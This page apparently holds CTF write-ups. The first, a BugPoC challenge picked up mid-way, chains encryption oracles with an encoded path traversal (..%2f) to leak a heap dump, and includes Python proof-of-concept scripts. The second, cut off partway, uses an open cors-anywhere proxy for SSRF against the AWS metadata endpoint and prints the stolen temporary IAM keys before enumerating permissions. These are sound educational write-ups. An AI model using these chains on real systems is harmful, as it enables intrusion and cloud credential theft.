$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 3.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=3", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog11.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog12.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog13.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog14.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog15.jpg\"]"}

$ echo 'gAAAAABgGg5u4W_yBC5YgusPCtmKOtxQYAgo161YK_Njo67ZLo6fGm6nyKwRIQ8divqkUL2mymw2fxeKF_BenpqSo79KuMj6JQ==' > 4.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 4.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=4", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog16.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog17.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog18.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog19.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog20.jpg\"]"}

Notice that the paths in the responses are largely similar. From our above testing, we can infer that the encrypted value likely contains /dogs?page=1, or perhaps simply ?page=1. Besides that, we also have two new discoveries:

  1. We now know that there is yet another endpoint on this API server – /dogs
  2. We found another S3 bucket at buggy-dog-pics.s3-us-west-2.amazonaws.com (spoiler: nothing much here, really :joy:)

Internal Endpoints

Let’s try to access the /dogs endpoint directly:

$ curl https://doggo-api.buggywebsite.com/dogs
Error, this endpoint is only internally accessible

It seems like this endpoint is accessible only from the internal network. It’s worth noting that we could fiddle with headers such as X-Forwarded-For: 127.0.0.1 to trick the application into thinking that the request comes from an internal network, but in this case the server isn’t vulnerable to such attacks.

Let’s move on to fuzz for other endpoints and see what we can do with them:

$ ffuf -u 'https://doggo-api.buggywebsite.com/FUZZ' -w ./SecLists/Discovery/Web-Content/quickhits.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : https://doggo-api.buggywebsite.com/FUZZ
 :: Wordlist         : FUZZ: ./SecLists/Discovery/Web-Content/quickhits.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

/heapdump               [Status: 401, Size: 50, Words: 7, Lines: 1]

Looks suspicious. Let’s check the response of the /heapdump endpoint:

$ curl https://doggo-api.buggywebsite.com/heapdump
Error, this endpoint is only internally accessible

We discovered another internal endpoint! But now what? What else can we do? :thinking:

Encryption & Decryption Oracles

Recall that earlier, we had to generate a fingerprint before using the /get-dogs endpoint to fetch the respective page of dog images. Let’s take a closer look at the endpoint request and response again carefully:

$ curl -s -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkm96w1MoKBnTslSzxiHX3VgcK-9j5ETD41Z0Q7zUm-gMCkNUdrJdg10n6l0SKxtmos5CrN4kkYACudYKcx_OGW3eezJ6ScQ3DHx_Sxr9kMavb5NTDKDO57iQPxNwu3DJGw_Sh1uok3McF-rEjTwd9ybzDbWfyFYYS9Ka-Gq6uAzHiNl9Z9sujy5XFUBoAcmEfoatp_Tl3LHCBv7Dbn0Et5YqPe5gxbRlDkvjqyw73nOJD7k=

Notice that the fingerprint returned in the JSON response starts with gAAAAAB too, indicating that the string may very well be a ciphertext produced using Fernet! What if we try to supply this fingerprint value as the x-param header value instead of one of the four pre-defined Base-64 strings?

$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

Interesting! It looks like we are able to successfully decrypt the fingerprint value. This indicates that the encryption key used for generating the four hardcoded Base-64 strings in the JavaScript file is also the same for generating the encrypted fingerprint value.

We can infer the following from the above output:

  • The fingerprint contains a serialised JSON object: {"UA": request.headers["User-Agent"]}.
  • The /get-dogs endpoint builds the URL to be fetched server-side by concatenating the protocol (e.g. http://), backend host (e.g. localhost), port (e.g. 80), the string /dogs, and the decrypted x-param header value. In other words, the server-side request URL is formed as: 'http://localhost:80/dogs' + decrypt(request.headers['x-param']).

In addition, we now know that we have an encryption oracle (the /fingerprint endpoint with a custom User-Agent header value) and a decryption oracle (the /get-dogs endpoint with a custom x-param header value containing the ciphertext). These provide us with powerful primitives – we can create valid ciphertexts for chosen plaintexts (albeit with some data prepended/appended due to the JSON serialisation) and use the generated ciphertexts to tamper with the path of the server-side request!

Getting to the /heapdump

Let’s take a closer look at how we can tamper with the request path:

$ curl -s -H 'User-Agent: TEST' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgku7UVOl_To_pUd7J1qzYfOJvbEhVqpa_7DN_7m5YZI0np1jfXoVzWSRROrWQy4bxWuYylza3pUMZffRv5DZ2DPQZsA==
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"TEST\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

Since we can’t modify the prepended /dogs string, the server-side request will always use a relative path beginning with /dogs. What we can do is to perform a path traversal attack to access another endpoint besides /dogs as such:

  • Set User-Agent header value to /../heapdump#
  • This results in the requested URL being something like http://localhost/dogs{"UA": "/../heapdump#"}, which may be normalised by the webserver to http://localhost/heapdump.

Note: Since the hash fragment is not sent to the server as part of the request, and most webservers ignore it anyway, we can effectively get rid of the trailing "} produced by the JSON serialisation. You could also use ? to force the trailing "} to be treated as a query string parameter, but some applications may not like that :)

Let’s try out the attack idea:

$ curl -s -H 'User-Agent: /../heapdump#' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkvSr7zNtRXxDO14Y37625vSYXQ9Ma8YwdxnEuWyV9cxCVzprPIl60ped_DSlpq2l2QKuAXbbSvRu479zVF97tMj4A-W8IEu5I6qpruHDf2w8Bm8
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"/heapdump#\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

It seems like ../ is being stripped from the request path. There are actually two bypasses for this.

The first bypass works because ../ is only stripped once over the whole string and not recursively: supplying ..././ leaves behind ../ after the strip, which is exactly what we wanted!
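Here’s a tiny sketch of why this works, assuming the backend strips ../ with a single non-recursive replacement (e.g. something equivalent to Python’s str.replace):

payload = "/..././heapdump#"

# One pass removes the only "../" present, but the characters left behind
# join up to form a new "../" that is never re-scanned.
print(payload.replace("../", ""))   # -> /../heapdump#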

The second bypass is to use URL-encoded path traversal payloads such as ..%2f, .%2e/ or %2e%2e%2f instead of ../. This works because most webservers URL-decode the request path before routing it to the application. We can easily verify that this behaviour exists:

$ curl https://doggo-api.buggywebsite.com/fingerprint/..%2fdogs
Error, this endpoint is only internally accessible

Clearly, we ended up being routed to the internal /dogs endpoint instead of the publicly-accessible /fingerprint endpoint, proving that this behaviour does exist.

Now, let’s go get the flag!

$ curl -s -H 'User-Agent: /..%2fheapdump#' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkvWY5SmGJUpySKZn2AjGP27q41C6DKljy3Xkg08fQZfvnvSCbAse2k_Dmx_JaVKN-QaOzgSQq2Nz_pIpDTUYMdhbdd_kjH9q1d1llgnKoECvB7o=
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"/..%2fheapdump#\"}", "statusCode": 200, "body": "\"name,size,value;__name__,57,lambda_function;__doc__,56,None;__package__,60,;__loader__,59,<_frozen_importlib_external.SourceFileLoader object at 0x7f9e042319a0>;__spec__,57,ModuleSpec(name='lambda_function', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7f9e042319a0>, origin='/var/task/lambda_function.py');__file__,57,/var/task/lambda_function.py;__cached__,59,/var/task/__pycache__/lambda_function.cpython-38.pyc;__builtins__,61,{'__name__': 'builtins', '__doc__': \\\"Built-in functions, exceptions, and other objects.\\\\n\\\\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.\\\", '__package__': '', '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': ModuleSpec(name='builtins', loader=<class '_frozen_importlib.BuiltinImporter'>), '__build_class__': <built-in function __build_class__>, '__import__': <built-in function __import__>, 'abs': <built-in function abs>, 'all': <built-in function all>, 'any': <built-in function any>, 'ascii': <built-in function ascii>, 'bin': <built-in function bin>, 'breakpoint': <built-in function breakpoint>, 'callable': <built-in function callable>, 'chr': <built-in function chr>, 'compile': <built-in function compile>, 'delattr': <built-in function delattr>, 'dir': <built-in function dir>, 'divmod': <built-in function divmod>, 'eval': <built-in function eval>, 'exec': <built-in function exec>, 'format': <built-in function format>, 'getattr': <built-in function getattr>, 'globals': <built-in function globals>, 'hasattr': <built-in function hasattr>, 'hash': <built-in function hash>, 'hex': <built-in function hex>, 'id': <built-in function id>, 'input': <built-in function input>, 'isinstance': <built-in function isinstance>, 'issubclass': <built-in function issubclass>, 'iter': <built-in function iter>, 'len': <built-in function len>, 'locals': <built-in function locals>, 'max': <built-in function max>, 'min': <built-in function min>, 'next': <built-in function next>, 'oct': <built-in function oct>, 'ord': <built-in function ord>, 'pow': <built-in function pow>, 'print': <built-in function print>, 'repr': <built-in function repr>, 'round': <built-in function round>, 'setattr': <built-in function setattr>, 'sorted': <built-in function sorted>, 'sum': <built-in function sum>, 'vars': <built-in function vars>, 'None': None, 'Ellipsis': Ellipsis, 'NotImplemented': NotImplemented, 'False': False, 'True': True, 'bool': <class 'bool'>, 'memoryview': <class 'memoryview'>, 'bytearray': <class 'bytearray'>, 'bytes': <class 'bytes'>, 'classmethod': <class 'classmethod'>, 'complex': <class 'complex'>, 'dict': <class 'dict'>, 'enumerate': <class 'enumerate'>, 'filter': <class 'filter'>, 'float': <class 'float'>, 'frozenset': <class 'frozenset'>, 'property': <class 'property'>, 'int': <class 'int'>, 'list': <class 'list'>, 'map': <class 'map'>, 'object': <class 'object'>, 'range': <class 'range'>, 'reversed': <class 'reversed'>, 'set': <class 'set'>, 'slice': <class 'slice'>, 'staticmethod': <class 'staticmethod'>, 'str': <class 'str'>, 'super': <class 'super'>, 'tuple': <class 'tuple'>, 'type': <class 'type'>, 'zip': <class 'zip'>, '__debug__': True, 'BaseException': <class 'BaseException'>, 'Exception': <class 'Exception'>, 'TypeError': <class 'TypeError'>, 'StopAsyncIteration': <class 'StopAsyncIteration'>, 'StopIteration': <class 'StopIteration'>, 'GeneratorExit': <class 'GeneratorExit'>, 'SystemExit': <class 'SystemExit'>, 
'KeyboardInterrupt': <class 'KeyboardInterrupt'>, 'ImportError': <class 'ImportError'>, 'ModuleNotFoundError': <class 'ModuleNotFoundError'>, 'OSError': <class 'OSError'>, 'EnvironmentError': <class 'OSError'>, 'IOError': <class 'OSError'>, 'EOFError': <class 'EOFError'>, 'RuntimeError': <class 'RuntimeError'>, 'RecursionError': <class 'RecursionError'>, 'NotImplementedError': <class 'NotImplementedError'>, 'NameError': <class 'NameError'>, 'UnboundLocalError': <class 'UnboundLocalError'>, 'AttributeError': <class 'AttributeError'>, 'SyntaxError': <class 'SyntaxError'>, 'IndentationError': <class 'IndentationError'>, 'TabError': <class 'TabError'>, 'LookupError': <class 'LookupError'>, 'IndexError': <class 'IndexError'>, 'KeyError': <class 'KeyError'>, 'ValueError': <class 'ValueError'>, 'UnicodeError': <class 'UnicodeError'>, 'UnicodeEncodeError': <class 'UnicodeEncodeError'>, 'UnicodeDecodeError': <class 'UnicodeDecodeError'>, 'UnicodeTranslateError': <class 'UnicodeTranslateError'>, 'AssertionError': <class 'AssertionError'>, 'ArithmeticError': <class 'ArithmeticError'>, 'FloatingPointError': <class 'FloatingPointError'>, 'OverflowError': <class 'OverflowError'>, 'ZeroDivisionError': <class 'ZeroDivisionError'>, 'SystemError': <class 'SystemError'>, 'ReferenceError': <class 'ReferenceError'>, 'MemoryError': <class 'MemoryError'>, 'BufferError': <class 'BufferError'>, 'Warning': <class 'Warning'>, 'UserWarning': <class 'UserWarning'>, 'DeprecationWarning': <class 'DeprecationWarning'>, 'PendingDeprecationWarning': <class 'PendingDeprecationWarning'>, 'SyntaxWarning': <class 'SyntaxWarning'>, 'RuntimeWarning': <class 'RuntimeWarning'>, 'FutureWarning': <class 'FutureWarning'>, 'ImportWarning': <class 'ImportWarning'>, 'UnicodeWarning': <class 'UnicodeWarning'>, 'BytesWarning': <class 'BytesWarning'>, 'ResourceWarning': <class 'ResourceWarning'>, 'ConnectionError': <class 'ConnectionError'>, 'BlockingIOError': <class 'BlockingIOError'>, 'BrokenPipeError': <class 'BrokenPipeError'>, 'ChildProcessError': <class 'ChildProcessError'>, 'ConnectionAbortedError': <class 'ConnectionAbortedError'>, 'ConnectionRefusedError': <class 'ConnectionRefusedError'>, 'ConnectionResetError': <class 'ConnectionResetError'>, 'FileExistsError': <class 'FileExistsError'>, 'FileNotFoundError': <class 'FileNotFoundError'>, 'IsADirectoryError': <class 'IsADirectoryError'>, 'NotADirectoryError': <class 'NotADirectoryError'>, 'InterruptedError': <class 'InterruptedError'>, 'PermissionError': <class 'PermissionError'>, 'ProcessLookupError': <class 'ProcessLookupError'>, 'TimeoutError': <class 'TimeoutError'>, 'open': <built-in function open>, 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'exit': Use exit() or Ctrl-D (i.e. EOF) to exit, 'copyright': Copyright (c) 2001-2021 Python Software Foundation.\\nAll Rights Reserved.\\n\\nCopyright (c) 2000 BeOpen.com.\\nAll Rights Reserved.\\n\\nCopyright (c) 1995-2001 Corporation for National Research Initiatives.\\nAll Rights Reserved.\\n\\nCopyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam.\\nAll Rights Reserved., 'credits':     Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands\\n    for supporting Python development.  
See www.python.org for more information., 'license': Type license() to see the full license text, 'help': Type help() for interactive help, or help(object) for help about object.};json,53,<module 'json' from '/var/lang/lib/python3.8/json/__init__.py'>;sys,52,<module 'sys' (built-in)>;SECRET_API_KEY,63,flag{gr8_job_h@cker};get_memory,59,<function get_memory at 0x7f9e03fb1160>;verify_internal_request,72,<function verify_internal_request at 0x7f9e03fb1280>;lambda_handler,63,<function lambda_handler at 0x7f9e03fb1310>;\""}

Near the end of the heap dump, we see the flag :)

Solution

To summarise, the following observations and steps led us to the flag:

  1. There is an internal endpoint (found through fuzzing) at /heapdump that dumps memory, including SECRET_API_KEY variable which contains the flag.
  2. The publicly-accessible /get-dogs endpoint appends the decrypted x-param header value in the requested path as such: '/dogs' + decrypt(request.headers['x-param']).
  3. The publicly-accessible /fingerprint endpoint generates the encrypted value of: {"UA": request.headers["User-Agent"]}, which gives rise to an encryption oracle.
  4. Although the /get-dogs endpoint has some protection against path traversal (e.g. stripping ../ from the request path), it is still possible to achieve path traversal by URL-encoding / as %2f.
  5. Leveraging /fingerprint endpoint to generate the encrypted value of a path traversal payload, and supplying the generated fingerprint as the x-param header in the /get-dogs endpoint allows us to access the internal /heapdump endpoint and leak the flag.

For a valid solution submission, participants needed to submit a proof-of-concept (PoC) hosted on BugPoC.
For simplicity, I opted to use their Python PoC to demonstrate the attack chain:

#!/usr/bin/env python3
import re
import requests

def main():
  endpoint = '/heapdump'
  path_traversal_payload = ('/..' + endpoint + '#').replace('/', '%2f')
  encrypted = requests.get('https://doggo-api.buggywebsite.com/fingerprint', headers={'User-Agent': path_traversal_payload}).json()['fingerprint']
  r = requests.get('https://doggo-api.buggywebsite.com/get-dogs', headers={'x-param': encrypted, 'x-fingerprint': 'a'})
  flag = re.search('SECRET_API_KEY[^;]+', r.text).group().split(',')
  flag[1] = ': '
  return ''.join(flag)

Running the proof-of-concept code using BugPoC’s Python PoC returns the following response containing the flag:

SECRET_API_KEY: flag{gr8_job_h@cker}

Memory Leak Proof-of-Concept

Challenge solved! :tada:

Closing Thoughts & Tips

As you might have noted by now, it is never a good idea to re-use the same encryption key for multiple purposes. An attacker with access to an encryption/decryption oracle can potentially trigger unintended behaviour (as demonstrated in this challenge). I have observed the re-use of a JWT signing key across production and staging servers a couple of times, which could be leveraged to achieve account takeover on the production server! :wink:

There are also a few tricks we could have used to perform better testing, which I did not mention in the write-up for brevity. Firstly, we only hunted for endpoints from an external perspective; the path traversal bug in the server-side request could also have been leveraged to fuzz for endpoints from the internal perspective.
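For instance, here is a rough sketch of reusing the encryption oracle plus the server-side request as an internal endpoint fuzzer – the wordlist and filtering are deliberately minimal:

import requests

API = "https://doggo-api.buggywebsite.com"
wordlist = ["admin", "debug", "env", "heapdump", "status"]   # tiny sample wordlist

for word in wordlist:
    # Encrypt a traversal payload pointing at the candidate internal endpoint...
    payload = f"/..%2f{word}#"
    token = requests.get(f"{API}/fingerprint",
                         headers={"User-Agent": payload}).json()["fingerprint"]
    # ...then let the server-side request hit it for us.
    r = requests.get(f"{API}/get-dogs",
                     headers={"x-param": token, "x-fingerprint": token})
    status = r.json().get("statusCode")
    if status != 404:
        print(word, status)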

Next, the path traversal payload (i.e. ..%2f) specifically targets the webserver’s URL path normalisation behaviour. Note that there is no guarantee it will work in real life, because we can’t know for sure which webserver is actually used on the backend! There could be multiple reverse proxies, or none at all – it all depends, and we can only enumerate and do a bit of guessing-and-checking to confirm our suspicions!

Another thing we could have done is to leverage the /fingerprint endpoint to identify how the request is being fetched by the application:

$ curl -s -H 'User-Agent: /..%2ffingerprint#' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkv0VCFdQy6oMxc1yJDY2WYHSKloG6Ik-OXHQ4Bw9CjgmAiO9j71e8rP_mJ0MM989mlsUiAlZaoPwsHr7vBd8a-E3tteAm4j4XJ1ASyXYJULa5-Y=
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"/..%2ffingerprint#\"}", "statusCode": 200, "body": "{\"fingerprint\": \"gAAAAABgkv0bO6yEXGQL8R9ddHZiEQe4Twv6-3ASNLhIZmWPSLXl833cuoiE_JrcIHgEBa54X5cWiqpoHvVT_GQBqkdPFXwOviKnz5BWdcEReMrlMI0sH672s2Hf_3Gxy1xUpJQwEAKU\"}"}
$ curl -H "x-fingerprint: actually this value isn't validated" -H "x-param: gAAAAABgkv0bO6yEXGQL8R9ddHZiEQe4Twv6-3ASNLhIZmWPSLXl833cuoiE_JrcIHgEBa54X5cWiqpoHvVT_GQBqkdPFXwOviKnz5BWdcEReMrlMI0sH672s2Hf_3Gxy1xUpJQwEAKU" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"python-requests/2.22.0\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

From the User-Agent string, we can infer that the URL is likely fetched using the Requests Python library on the server side. We could also examine and target a specific behaviour of the HTTP client in our attack. For instance, did you know that urllib accepts “wrapped” URLs? Check out this writeup by @Gladiator to see how this behaviour was used to bypass a WAF in a CTF challenge!

I hope you enjoyed the write-up. :smiley:
Thanks BugPoC/@NahamSec for the fun challenge!

Here’s my write-up on yet another cloud challenge with no solves titled Keep The Clouds Together... in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG).

If you are new to cloud security, do check out my write-up for Share and Deploy the Containers cloud challenge before continuing on.

The attack path for this challenge is much longer and more complex than the other cloud challenges in the competition, further highlighting the difficulty of penetration testing infrastructures that span multiple cloud computing vendors.

Once again, shoutouts to Tan Kee Hock from GovTech’s CSG for putting together this challenge!

Keep the Clouds Together…

Description:
The recent arrest of an agent from COViD revealed that the punggol-digital-lock.com was part of the massive scam campaign targeted towards the citizens! It provided a free document encryption service to the citizens and now the site demands money to decrypt the previously encrypted files! Many citizens fell prey to their scheme and were unable to decrypt their files! We believe that the decryption key is broken up into parts and hidden deep within the system!

Notes - https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/notes-to-covid-developers.txt

Introduction

The note at https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/notes-to-covid-developers.txt has the following content:

Please get your act together. The site that is supposed load the list of affected individuals is not displaying properly.
index.html is not loading the users as expected.
For your convenience, I have also generated your git credentials. See me.

- COViD

Notice that the note is hosted in an Amazon S3 bucket named punggol-digital-lock-portal in the ap-southeast-1 region. From the note, we learn that there is an index.html object in the punggol-digital-lock-portal S3 bucket and that we should be looking for git credentials somewhere.

Let’s navigate to https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/index.html: S3 Bucket /index.html

As the note mentioned, the list of affected individuals indeed fails to load.
Let’s take a peek at the JavaScript code included by the webpage:

var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://122.248.230.66/http://127.0.0.1:8080/dump-data", false);
xhttp.send();
var data = (JSON.parse(xhttp.responseText)).data;
for (i = 0; i < data.length; i++) {
    output = "<tr><td>" + (i+1) + "</td><td>" + data[i].name + "</td><td>" + data[i].no_of_files + "</td><td>" + data[i].total_file_size + "</td><td>" + Math.ceil(data[i].cash_bounty) + "</td></tr>";
document.write(output);
}

The page attempts to fetch a JSON document containing the list of affected individuals from the IP address 122.248.230.66, which belongs to Amazon Elastic Compute Cloud (EC2).

cors-anywhere = SSRF to Anywhere

If we navigate to http://122.248.230.66/, we can see the following response:

This API enables cross-origin requests to anywhere.

Usage:

/               Shows help
/iscorsneeded   This is the only resource on this host which is served without CORS headers.
/<url>          Create a request to <url>, and includes CORS headers in the response.

If the protocol is omitted, it defaults to http (https if port 443 is specified).

Cookies are disabled and stripped from requests.

Redirects are automatically followed. For debugging purposes, each followed redirect results
in the addition of a X-CORS-Redirect-n header, where n starts at 1. These headers are not
accessible by the XMLHttpRequest API.
After 5 redirects, redirects are not followed any more. The redirect response is sent back
to the browser, which can choose to follow the redirect (handled automatically by the browser).

The requested URL is available in the X-Request-URL response header.
The final URL, after following all redirects, is available in the X-Final-URL response header.


To prevent the use of the proxy for casual browsing, the API requires either the Origin
or the X-Requested-With header to be set. To avoid unnecessary preflight (OPTIONS) requests,
it's recommended to not manually set these headers in your code.


Demo          :   https://robwu.nl/cors-anywhere.html
Source code   :   https://github.com/Rob--W/cors-anywhere/
Documentation :   https://github.com/Rob--W/cors-anywhere/#documentation

This indicates that the cors-anywhere proxy application is deployed, allowing us to perform Server-Side Request Forgery (SSRF) attacks. When browsing to http://122.248.230.66/http://127.0.0.1:8080/dump-data, we get the following error message:

Not found because of proxy error: Error: connect ECONNREFUSED 127.0.0.1:8080

This indicates that port 8080 appears to be inaccessible, which is why the list of victims could not be loaded.
Perhaps the webserver is not even hosted locally!

Since we have identified the IP address 122.248.230.66 is an AWS EC2 instance, we can leverage the SSRF vulnerability to fetch information such as temporary IAM access keys from AWS Instance Metadata service:

$ curl http://122.248.230.66/http://169.254.169.254/latest/meta-data/iam/security-credentials/
punggol-digital-lock-service
$ curl http://122.248.230.66/http://169.254.169.254/latest/meta-data/iam/security-credentials/punggol-digital-lock-service
{
  "Code" : "Success",
  "LastUpdated" : "2020-12-09T21:53:30Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA4I6UNNJLGGSBLNBE",
  "SecretAccessKey" : "1Hs4gJ1DHlOn6sNYJ6CtwJFMj9L6U+GJV/0Av5Q7",
  "Token" : "IQoJb3JpZ2luX2VjEM7//////////wEaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJgswJ1LBujtBko8u03aQkzuVtJTFlHB/dTP3UgTDv3aAiBe7wD5quvPKBFUX2qdJKnCyMxNKjIgKEKc2do3jczakCq+AwhnEAAaDDg0Mzg2OTY3ODE2NiIMJlawVwTJAsubX6TqKpsD05mftdNYOX+Ah24OPCzBrzduIdKECcoUyux2ZkLc5LSXiGEFvowOW9heGnHBFXc1AWn1sKszOUC26vZxDO9cgItbd42KpzmRWE+wuplxwycObf6MkX8Yx0li8ARgHMduOT+PmCQMKX65lrTRUrc/RPgWet9shjrnCAr5jlOyedfOWH5nlnvSXpCvoOJ2jOatkO/8Xppp7D9yPtRTeEt9dhmJ7gBzLqiiGckTOLL2bouOYi5j9qzBC67c79t0eoSXGz81ef9+M2tXLZX8M++1t1eQjzomTomXXsgZaRQNIRSimAr2y2I6mIXYkXU4fq3DgJ8yUe3y0Nmch3Jk+8lMD5aH+R0voRxckzx5O3NZ3+E4gGkRoW8luR3O7andLR8aO4gaIpNIaC60sXrYaLUsg9B6Ihtk50ysuPXY+y8K3OgbG9CdHnoHzaCN93/7A/sWqVWIgaMUtrnZzoIGIh9NDqsjRipA7M3OsF7ALkhx6nBiifyehd6gt9oPsBV66OWxf3pZOQ4aPqxlZAlGuScfa4s09SdDl6sXYW0cMKuOxf4FOusB/n6uszhbbXM82FGtdR9m55oU/M/3cgkYgAxnELjR28Hbv0CYLqiEgppoGY3s9gd3SL8Tuq5gGrB38/mzlLmXDiLgqXxexrj87GEq671Th6+CMsuklxjlAs/BBuh2oUQvWIgs9kd1PayLiuRqrTPY33+RDPo1lJJgUvWnTP67PlMBwvUWukdtA1I7opJW8AybRYZtBdBHV7uWSvz4M8l6rpJFzLiAPhC2ob8M4J4aQtG3HVIYyk69QxpzkCCKgt5dwkmjQLUlKjBBfutzYHbhAc5TH4ysaydt6J2E0JbmiVhwNqdB7lCvWADQMw==",
  "Expiration" : "2020-12-10T04:13:44Z"
}

Great! We have successfully obtained temporary security credentials for the punggol-digital-lock-service assumed-role user.
Here’s a quick recap on our progress before we continue on: Initial Entrypoint Progress

Enumerating punggol-digital-lock-service Role

I used WeirdAAL (together with AWS CLI v1) to automate the enumeration of the permitted actions for the assumed-role user.

$ cat ~/.aws/credentials
[default]
aws_access_key_id = ASIA4I6UNNJLGGSBLNBE
aws_secret_access_key = 1Hs4gJ1DHlOn6sNYJ6CtwJFMj9L6U+GJV/0Av5Q7
aws_session_token = IQoJb3JpZ2luX2VjEM7//////////wEaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJgswJ1LBujtBko8u03aQkzuVtJTFlHB/dTP3UgTDv3aAiBe7wD5quvPKBFUX2qdJKnCyMxNKjIgKEKc2do3jczakCq+AwhnEAAaDDg0Mzg2OTY3ODE2NiIMJlawVwTJAsubX6TqKpsD05mftdNYOX+Ah24OPCzBrzduIdKECcoUyux2ZkLc5LSXiGEFvowOW9heGnHBFXc1AWn1sKszOUC26vZxDO9cgItbd42KpzmRWE+wuplxwycObf6MkX8Yx0li8ARgHMduOT+PmCQMKX65lrTRUrc/RPgWet9shjrnCAr5jlOyedfOWH5nlnvSXpCvoOJ2jOatkO/8Xppp7D9yPtRTeEt9dhmJ7gBzLqiiGckTOLL2bouOYi5j9qzBC67c79t0eoSXGz81ef9+M2tXLZX8M++1t1eQjzomTomXXsgZaRQNIRSimAr2y2I6mIXYkXU4fq3DgJ8yUe3y0Nmch3Jk+8lMD5aH+R0voRxckzx5O3NZ3+E4gGkRoW8luR3O7andLR8aO4gaIpNIaC60sXrYaLUsg9B6Ihtk50ysuPXY+y8K3OgbG9CdHnoHzaCN93/7A/sWqVWIgaMUtrnZzoIGIh9NDqsjRipA7M3OsF7ALkhx6nBiifyehd6gt9oPsBV66OWxf3pZOQ4aPqxlZAlGuScfa4s09SdDl6sXYW0cMKuOxf4FOusB/n6uszhbbXM82FGtdR9m55oU/M/3cgkYgAxnELjR28Hbv0CYLqiEgppoGY3s9gd3SL8Tuq5gGrB38/mzlLmXDiLgqXxexrj87GEq671Th6+CMsuklxjlAs/BBuh2oUQvWIgs9kd1PayLiuRqrTPY33+RDPo1lJJgUvWnTP67PlMBwvUWukdtA1I7opJW8AybRYZtBdBHV7uWSvz4M8l6rpJFzLiAPhC2ob8M4J4aQtG3HVIYyk69QxpzkCCKgt5dwkmjQLUlKjBBfutzYHbhAc5TH4ysaydt6J2E0JbmiVhwNqdB7lCvWADQMw==

$ aws sts get-caller-identity
{
    "UserId": "AROA4I6UNNJLJABU4K2VW:i-0da9e688ab9264a5e",
    "Account": "843869678166",
    "Arn": "arn:aws:sts::843869678166:assumed-role/punggol-digital-lock-service/i-0da9e688ab9264a5e"
}

$ cp ~/.aws/credentials .env

$ python3 weirdAAL.py -m recon_all -t punggol-digital-lock-service
...

$ python3 weirdAAL.py -m list_services_by_key -t punggol-digital-lock-service
[+] Services enumerated for ASIA4I6UNNJLIWT435IG [+]
codecommit.ListRepositories
dynamodb.ListTables
